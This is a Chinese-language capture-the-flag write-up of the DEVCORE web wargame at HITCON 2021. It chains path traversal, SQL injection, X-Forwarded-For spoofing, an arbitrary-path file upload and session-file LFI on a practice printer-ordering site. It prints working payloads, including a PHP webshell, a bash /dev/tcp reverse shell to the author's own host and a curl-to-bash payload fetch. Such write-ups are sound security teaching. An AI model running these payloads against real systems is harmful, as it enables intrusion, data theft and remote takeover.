DEVCORE WarGame (Web) for HITCON 2021 Writeup

By Steven Meow

• URL : https://wargame.devcore.tw/
  • Web : http://web.ctf.devcore.tw/
• 今年與去年一樣，在 HITCON 會場上有 DEVCORE 的擺攤，解 Wargame 就可以換小獎品與 NFT，而且據說今年的題目都是來自現實生活中的真實案例改編，我覺得題目比起去年明顯的簡單了不少。
• 但我還是覺得在 HITCON 辦這種活動不太優 QQ 會害人無法專心聽議程，都在解題。畢竟這種 Conf，我覺得聽議程還是比較重要 Q__Q。

弱點 01 Path Traversal

• 簡單逛一下網頁會發現是一個印表機的訂購網站
  • 
• 觀察進入網頁首頁的 HTTP Request 可以看到一個明顯可疑的 URL
  • http://web.ctf.devcore.tw/image.php?id=aHBfbTI4M2Zkdy5qcGc=
  • 
• 根據一點點的小直覺，可以猜出 ID 的參數是透過 Base64 編碼的 (因為結尾有出現=)
  • 解碼後可以看出是圖片的檔名
    • 
  • 而直接訪問則會出現印表機的圖片
    • 
• 我們可以合理的猜測這可能有一個任意讀檔，或是 LFI 的漏洞，前提是需要把路徑轉 Base64 再放入 ID
  • 首先測試 /etc/passwd
  • 透過 echo -n '../../../../../../../etc/passwd' | base64 -w0
  • 可以取得 Li4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
  • 再把 Base64 的結果串上網址的 ID，用 curl 送 request
  • 發現可以順利取得 /etc/passwd
    • 
    • 而且告訴了我們 Flag 在 php 原始碼裡面
  • 至此，可以非常合理的確認我們可以讀檔了
  • 我們也可以把指令寫的更直觀一點
    • curl http://web.ctf.devcore.tw/image.php?id=$(echo -n '../../../../../../../etc/passwd' | base64 -w0)
    • 未來只需要修改路徑就可以快速發送 Requests
• 尋找網頁根目錄
  • 通常，預設的網頁根目錄會放在 /var/www/html
    • 但這個網站看起來有刻意的設計過，所以檔案目標不在這邊
    • 
  • 在現代，為了方便，大多數的服務都會透過 Docker 來進行部屬 (特別是 CTF 題目，被打爛了可以快速砍掉重架)，而 Docker 通常會透過 Mount 目錄等方法，使 Docker 內外互通
    • 我們可以透過 /proc/1/mountinfo 或是 /proc/self/mounts 看到一些掛載的資訊
      • 
      • 從上面的一堆垃圾可以確認我們真的在 docker 裡面
      • 另外我們可以注意到下面有一些有趣的東西
      • /usr/share/nginx/images
      • /usr/share/nginx/b8ck3nd
      • /usr/share/nginx/frontend
      • 我們可以合理懷疑原始碼就藏在這幾個路徑裡面
• 取得原始碼
  • 前端首頁 (後面只寫路徑)
    • curl http://web.ctf.devcore.tw/image.php?id=$(echo -n '../../../../../../../usr/share/nginx/frontend/index.php' | base64 -w0)
      • 可以發現裡面有 require_once('include.php');
  • 前端 include
    • /usr/share/nginx/frontend/include.php
      • 
      • 就順利取得 Flag 1 了
  • 前端 image
    • /usr/share/nginx/frontend/image.php
    • 可以發現它只是 Base64 解開丟 readfile($file);，所以沒有 LFI ，只能任意讀檔
• 官方報告

–

弱點 02：Broken Access Control

• 開始玩一下網頁的功能
  • 立刻訂購
    • index.php
    • 
  • 訂購成功
    • submit.php
    • 
  • 訂單資訊
    • order.php?id=35163&sig=PFRo8eZYWmnXmM4UJfApOvPZlnBtQoIsoRejgCzlIe5fkPu8FnxhYmD56zlSblHY
    • 雖然我們看到了一些參數，但不需要急著 SQL injection，因為我們可以透過第一個漏洞來讀原始碼，確認有沒有漏洞
  • 查看收據
    • receipt.php?id=35163&sig=PFRo8eZYWmnXmM4UJfApOvPZlnBtQoIsoRejgCzlIe5fkPu8FnxhYmD56zlSblHY
    • 
  • 列印
    • 按下去後會出現一個匯出 PDF 的頁面
    • 
  • 匯出 PDF
    • print.php?id=35163&sig=PFRo8eZYWmnXmM4UJfApOvPZlnBtQoIsoRejgCzlIe5fkPu8FnxhYmD56zlSblHY
    • 
• 觀察以上幾個頁面的原始碼，我們可以快速的發現 print.php 上面有一個 SQL injection 的弱點 php $res = $pdo->query(" SELECT * FROM orders WHERE sig_hash = '$sig_hash' AND id = $id LIMIT 1 ", PDO::FETCH_ASSOC);
  • 使用者可控 id 的部分
    • 我們可以隨意來寫個
      • http://web.ctf.devcore.tw/print.php?sig=1&id=1 or 1=1
    • 然後就拿到 Flag 了 ?__?
    • 
• 官方報告
  • 
• 欸好ㄛ，我的方法是一個非預期解的意思，那我們來看一下正規解
  • http://web.ctf.devcore.tw/order.php?id=1&sig[]=
  • 就拿到 Flag 了
  • 
  • 而原理可以看官方報告上有詳述，主要就是因為 sig 參數給予一個 [] 代表陣列，會讓 php 解到爛掉

---

弱點 04：Use of Less Trusted Source

• 對，我先寫 4 ，因為我先解出 4 才找到 3 的
• 剛剛我們找到了一個 SQL injection 的漏洞，所以可以用 SQL injection 來取得所有資料庫裡面的資料
  • 所以需要先透過 information_schema 那一串套路去看 SQL 裡面有哪些 DB 、 Table 、 Column 再來選嗎?
    • 答案是不用的，因為我們已經有完整的 Source Code 所以可以直接看!
• 觀察檔案
  • 從最最前面 mount 的資料夾中，我們可以看到其中有一個 b8ck3nd 的資料夾
  • b8ck3nd/index.php
    • 裡面有 include.php , upload.php
  • b8ck3nd/include.php
    • 裡面有一段說到，我們的 IP 必須為 ['127.0.0.1', '172.18.11.89'] 才能進入後台，不然會被導向首頁
    • 還有說到，沒有登入的話，會被導到 login.php
  • b8ck3nd/login.php
    • 裡面有一段 SELECT * FROM backend_users WHERE username = %s AND password = %s'
      • 它的 username 跟 password 都會經過 quote，所以不能從這邊直接的進行 SQL injection
      • 但我們可以確定 Table backend_users 裡面一定有 username, password 這兩個 Column
• 正式 SQL injection
  • 回到前一題的 SQL injection 如果我們給予 or 1=1 的話，可以取得 Flag2 ，如果給予 or 1=0 的話，則畫面會空白，最無腦的方法就是使用 Boolean based 的 SQL injection
  • 不過由於它回傳的是一個 PDF 檔案，所以 SQLMap 會解到壞掉
    • 這邊我使用 import pdftotext 來讀取 PDF 的內容，如果 steven 這個詞出現在 PDF 中，就代表 True ，不然就代表 False
    • 自己刻一個 Binary Search 的 Boolean Based SQL injection Payload 就可以爆出資料庫的所有資料了，我有程式碼但寫得很醜，就先不公布ㄌ XDD。
      • 
  • 另外一種解法 (Wii Wu 提供)
    • 其實可以透過 UNION Based 的方法來取
    • http://web.ctf.devcore.tw/print.php?id=-1 UNION SELECT id as id, username as email, password AS phone ,NULL,NULL,NULL,NULL,NULL,NULL FROM backend_users
    • 
  • 至此我們可以取得
    • username : admin
    • password : u=479_p5jV:Fsq(2
• 回到前面說的 b8ck3nd/include.php
  • 我們必須要使用 127.0.0.1 或是 172.18.11.89 IP 才能進入後台
  • 最常見的方法是透過修改 X-Forwarded-For 的 Header 來進行達成
    • 詳見 : https://devco.re/blog/2014/06/19/client-ip-detection/
    • 通常大多數人會使用 BurpSuite 進行修改，不過我個人推薦使用更懶人的 Firefox Plugin
      • 
• 順利訪問後台 http://web.ctf.devcore.tw/b8ck3nd/login.php
  • 
• 可以使用上述的帳密進行登入，取得 Flag 4
  • 
• 官方報告
  • 
  • 好的，看起來很符合

– 但我的 Flag3 去哪了 QQ

弱點 03：SQL Injection

• 其實我合理猜測是因為我們快速地透過原始碼取得 Column 跟 Table 進行登入，但省略了某些東西，Flag 在裡面。因為至今還沒有出現 SQL injection 的弱點報告，但我們都透過 SQLinjection 取得兩個 Flag 了 XDDDD
• 接下來我就直接借用 Wii Wu 提供的 Union Based 來寫
  • 使用 SQL 取得 DB, Table, Column 的老梗來找
  • 但我想反著找，看看 backend_users 裡面有沒有什麼有趣的其他 Column
  • http://web.ctf.devcore.tw/print.php?id=-1 UNION SELECT NULL, NULL, group_concat(column_name), NULL, NULL, NULL, NULL, NULL, NULL FROM information_schema.columns WHERE table_name='backend_users'
  • 
  • 我們可以看到還有一個 description 的 column
• 取得 description 欄位的值即為 Flag
  • http://web.ctf.devcore.tw/print.php?id=-1 UNION SELECT NULL, NULL, description, NULL, NULL, NULL, NULL, NULL, NULL FROM backend_users
  • 
• 官方報告

–

弱點 05：Unrestricted File Upload

• 接下來繼續地回到了 Code Review 的環節
  • b8ck3nd/index.php
    • 裡面發現會把一些資訊傳到 upload.php
  • b8ck3nd/upload.php
    • 程式分成了兩個部分
      • 如果透過 GET Method 進入，會回傳一段 JWT，但對於解題沒有任何幫助
      • 下面有一段是沒有任何前端對應的後端 API
        1. 可以上傳檔案
        2. 參數 rename 可以指定檔案名稱
        3. 參數 folder 可以指定檔案資料夾
           • 會透過 $filename = $folder.'/'.$filename; 直接把資料夾跟檔名進行串接
           • 很值觀的猜測可以用 folder 來進行任意位置寫入
• 所以我們可以隨便上傳一個檔案看看，但要記得帶上 Header 跟 Session Cookie，但當大家看到這篇時，理論上下面的 Session 已經過期ㄌ
  • echo meow > meow.txt
  • Session Cookie 可以透過瀏覽器 F12 取得
  • curl -H 'X-Forwarded-For: 127.0.0.1' --cookie 'PHPSESSID=5qh67f4o30aa8r2313gjv8iucd' -F 'file=@meow.txt' -F 'rename=meow.txt' -F 'folder=../../../../../../tmp' http://web.ctf.devcore.tw/b8ck3nd/upload.php
• 上面的 command 丟出去就可以取得 Flag5
  • 
• 官方報告

–

弱點 06：Local File Inclusion

• 我覺得這一段是全部裡面最難的部分，我個人卡了超級超級久
• 首先大家應該會非常直觀的想到
  • 如果我把程式碼寫到 frontend/, images/, 或 b8ck3nd，是不是就可以成功地拿到 Webshell
  • 但事實真正的嘗試會發現這些目錄都不可寫
• 回到觀察程式碼的部分
  • frontend/include.php
    • 我們可以發現有一行 require_once('langs/' . $_SESSION['lang'] . '.php');
    • 而如果我們訪問 frontend/index.php 就會呼叫到 frontend/include.php
• 所以 …… 這邊會是一個 LFI 的漏洞嗎?
  • LFI 的前提要是 Session 可控
  • 我們可以查資料發現到，PHP 的 Session 資料會放在 /tmp/sess_{SESSION_ID}
  • 
  • 我們使用弱點 1 就可以快速的取得目前我們的 Session 資料
• 那我們是不是可以把 Session 資料載下來，自己進行竄改之後達成 LFI 2 RCE 呢?
  • 假設我們使用弱點 6 寫入一個 Webshell 在 /tmp/meowmeow.php
  • 再來，控制 $_SESSION['lang'] ，設定為 ../../../../../../tmp/meowmeow (在frontend/include.php 會自動幫我們加上 .php)
  • 訪問網頁首頁即可取得 webshell
• 首先我們先下載 curl http://web.ctf.devcore.tw/image.php?id=$(echo -n '../../../../../../../tmp/sess_5qh67f4o30aa8r2313gjv8iucd' | base64 -w0) -o sess_meow
  • 內容是 lang|s:5:"zh-tw";user_id|s:1:"1";
  • 就算不懂結構我們也可以猜出
    • zh-tw 是我們需要變更的部分
    • s:5 是後面接的字串長度
• 所以我們準備一個檔案
  • lang|s:33:"../../../../../../../tmp/meowmeow";user_id|s:1:"1";
  • 上傳到 /tmp/sess_meowmeow
  • curl -H 'X-Forwarded-For: 127.0.0.1' --cookie 'PHPSESSID=5qh67f4o30aa8r2313gjv8iucd' -F 'file=@sess_meowmeow' -F 'rename=sess_meowmeow' -F 'folder=../../../../../../tmp' http://web.ctf.devcore.tw/b8ck3nd/upload.php
  • 可以觀察確定上傳正確
    • 
• 再準備一個 webshell
  • <?php system($_GET['meow']); ?> 命名為 meowmeow.php
  • 上傳到 /tmp/meowmeow.php
  • curl -H 'X-Forwarded-For: 127.0.0.1' --cookie 'PHPSESSID=5qh67f4o30aa8r2313gjv8iucd' -F 'file=@meowmeow.php' -F 'rename=meowmeow.php' -F 'folder=../../../../../../tmp' http://web.ctf.devcore.tw/b8ck3nd/upload.php
  • 確認檔案上傳正確
    • 
• 最後我們只需要使用 meowmeow 這個 Session ID 訪問 index.php 即可拿到 Webshell
  • curl -H 'X-Forwarded-For: 127.0.0.1' --cookie 'PHPSESSID=meowmeow' http://web.ctf.devcore.tw/index.php?meow=ls
  • 
• 當然我們也可以用酷炫的方法拿 Reverse Shell
  • (需要自備一個有對外 IP 的電腦或 Ngrok，不做這一段也可拿 Flag)
  • 首先在機器上準備一個 s8787 檔案
    • bash -c 'bash -i >& /dev/tcp/{自己的IP}/8787 0>&1'
  • 輸入 python3 -m http.server 8000
    • 開啟一個 Python HTTP Server
  • 在自己電腦上開一個 nc 接收
    • rlwrap nc -nlvp 7877 (沒有 rlwrap 就直接 nc 也可)
  • curl -H 'X-Forwarded-For: 127.0.0.1' --cookie 'PHPSESSID=meowmeow' 'http://web.ctf.devcore.tw/index.php?meow=curl%20http://{自己的IP}:8000/s8787%20%7C%20/bin/bash'
  • 執行下去後，會發現 Python HTTP Server 接收到了一個 Request
    • 
  • 我們的 nc 端也收到一個 Reverse Shell
    • 
• 觀察根目錄的檔案
  • 
  • 我們會發現沒有權限讀 flag，但是我們有一個檔案叫做 readflag，它有 SUID 且 Owner 是 Root
  • 透過 file 觀察可以確定它是一個執行檔
  • 
• 直接執行 ./readflag 即可取得 Flag

• 當然我們有 Webshell 的話，不用 Reverse Shell 也可以直接取得 Flag
  • curl -H 'X-Forwarded-For: 127.0.0.1' --cookie 'PHPSESSID=meowmeow' 'http://web.ctf.devcore.tw/index.php?meow=/readflag'

• 官方報告